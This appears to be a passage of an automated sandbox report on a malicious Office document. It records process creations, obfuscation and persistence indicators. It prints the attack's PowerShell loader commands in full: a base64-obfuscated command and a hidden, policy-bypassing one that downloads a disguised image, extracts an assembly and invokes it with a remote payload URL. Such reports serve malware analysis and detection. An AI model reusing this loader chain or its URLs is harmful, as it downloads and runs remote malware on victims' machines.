            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: 96630000.0.drInitial sample: OLE indicators vbamacros = False
            Source: 40830001.xlsInitial sample: OLE indicators encrypted = True

            Data Obfuscation

            barindex
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_00129247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,19_2_00129247
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00302DB5 pushad ; ret 13_2_00302DC9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00302DD0 pushfd ; ret 13_2_00302DD9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00300F45 push ebx; iretd 13_2_00300F62
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040134A pushfd ; retf 14_2_00401353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004012F2 pushfd ; retf 14_2_004012F3
            Source: C:\Windows\explorer.exeCode function: 20_2_00061405 push esi; ret 20_2_00061407
            Source: C:\Windows\explorer.exeCode function: 20_2_000647A7 push esp; iretd 20_2_000647A8
            Source: C:\Windows\explorer.exeCode function: 20_2_000614D4 push esi; ret 20_2_000614D6
            Source: C:\Windows\explorer.exeCode function: 20_2_0006A055 push es; iretd 20_2_0006A05D
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_000838A7 push esp; iretd 21_2_000838A8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_0008967E push ds; retf 21_2_00089680
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_000894E6 push edx; ret 21_2_000894E7
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000887CE push es; ret 22_2_00088A18
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00088EEF push edi; ret 22_2_00088EF0
            Source: C:\Windows\explorer.exeCode function: 23_2_000E1405 push esi; ret 23_2_000E1407
            Source: C:\Windows\explorer.exeCode function: 23_2_000E14D4 push esi; ret 23_2_000E14D6
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 24_2_00083417 push esp; iretd 24_2_00083418
            Source: C:\Windows\explorer.exeCode function: 25_2_000E1405 push esi; ret 25_2_000E1407
            Source: C:\Windows\explorer.exeCode function: 25_2_000E45A7 push esp; iretd 25_2_000E45A8
            Source: C:\Windows\explorer.exeCode function: 25_2_000E14D4 push esi; ret 25_2_000E14D6
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 26_2_00083627 push esp; iretd 26_2_00083628
            Source: C:\Windows\explorer.exeCode function: 27_2_000EAC8D push esp; iretd 27_2_000EAC95
            Source: C:\Windows\explorer.exeCode function: 27_2_000EAAD2 push ebp; iretd 27_2_000EAAD3
            Source: C:\Windows\explorer.exeCode function: 27_2_000E1405 push esi; ret 27_2_000E1407
            Source: C:\Windows\explorer.exeCode function: 27_2_000E14D4 push esi; ret 27_2_000E14D6

            Persistence and Installation Behavior

            barindex
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\crash.sh@SSL\DavWWWRootJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\crash.sh@SSL\DavWWWRootJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile dump: inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday[1].doc.0.drJump to dropped file
